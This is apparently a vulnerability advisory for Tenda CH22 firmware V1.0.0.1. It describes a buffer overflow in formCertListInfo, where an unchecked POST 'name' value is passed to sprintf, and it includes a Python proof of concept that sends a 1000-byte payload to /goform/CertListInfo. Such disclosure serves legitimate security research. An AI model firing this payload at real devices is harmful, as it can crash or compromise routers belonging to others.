Overview

Affected version

CH22 V1.0.0.1

Vulnerability details

The Tenda CH22 V1.0.0.1 firmware has a buffer overflow vulnerability in the formCertListInfo function. The V12 variable receives the name parameter from a POST request and is later passed to the sprintf function. However, since the user can control the input of name , the statement sprintf(s, "/etc/cert/%s", v12); can cause a buffer overflow.

image.png

image.png

PoC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/CertListInfo'
payload = b'a' * 1000
data = {
    'name':payload
}

requests.post(url, data=data)

image2.png